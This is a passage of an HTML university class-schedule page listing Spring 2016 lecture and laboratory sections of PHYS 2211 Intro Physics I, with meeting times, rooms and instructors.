<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">11:05 am - 11:55 am</td>
<td class="dddefault">MWF</td>
<td class="dddefault">Howey (Physics) L4</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Martin Michael Jarrio (<abbr title="Primary">P</abbr>)<a href="mailto:martin.jarrio@physics.gatech.edu" target="Martin M. Jarrio"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 7:25 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Howey (Physics) L4</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Martin Michael Jarrio (<abbr title="Primary">P</abbr>)<a href="mailto:martin.jarrio@physics.gatech.edu" target="Martin M. Jarrio"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20998">Intro Physics I - 20998 - PHYS 2211 - B01</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 1:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 2:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 325</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20999">Intro Physics I - 20999 - PHYS 2211 - B02</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 3:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 325</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 5:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21000">Intro Physics I - 21000 - PHYS 2211 - B03</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 3:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 4:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 127</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21001">Intro Physics I - 21001 - PHYS 2211 - B04</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 3:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 123</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 5:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21002">Intro Physics I - 21002 - PHYS 2211 - B05</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 2:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 125</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">1:05 pm - 2:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21003">Intro Physics I - 21003 - PHYS 2211 - B06</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 4:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 123</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 4:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21032">Intro Physics I - 21032 - PHYS 2211 - B07</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">1:05 pm - 2:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 3:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 123</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21320">Intro Physics I - 21320 - PHYS 2211 - B08</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 2:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 325</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 4:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22033">Intro Physics I - 22033 - PHYS 2211 - B09</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 3:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 382</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 4:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 325</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21019">Intro Physics I - 21019 - PHYS 2211 - C</a></th>
</tr>
<tr>
<td class="dddefault">
Students must also register for a Lab Section that begins
with the letter C. No lab exemptions are offered.
This class will have evening tests approximately once every
three weeks.
<br>
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Lecture* Schedule Type
<br>
4.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>L
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 12:55 pm</td>
<td class="dddefault">MWF</td>
<td class="dddefault">Howey (Physics) L4</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Simon Sponberg (<abbr title="Primary">P</abbr>)<a href="mailto:simon.sponberg@physics.gatech.edu" target="Simon Sponberg"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 7:25 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Howey (Physics) L1</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Simon Sponberg (<abbr title="Primary">P</abbr>)<a href="mailto:simon.sponberg@physics.gatech.edu" target="Simon Sponberg"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21004">Intro Physics I - 21004 - PHYS 2211 - C01</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
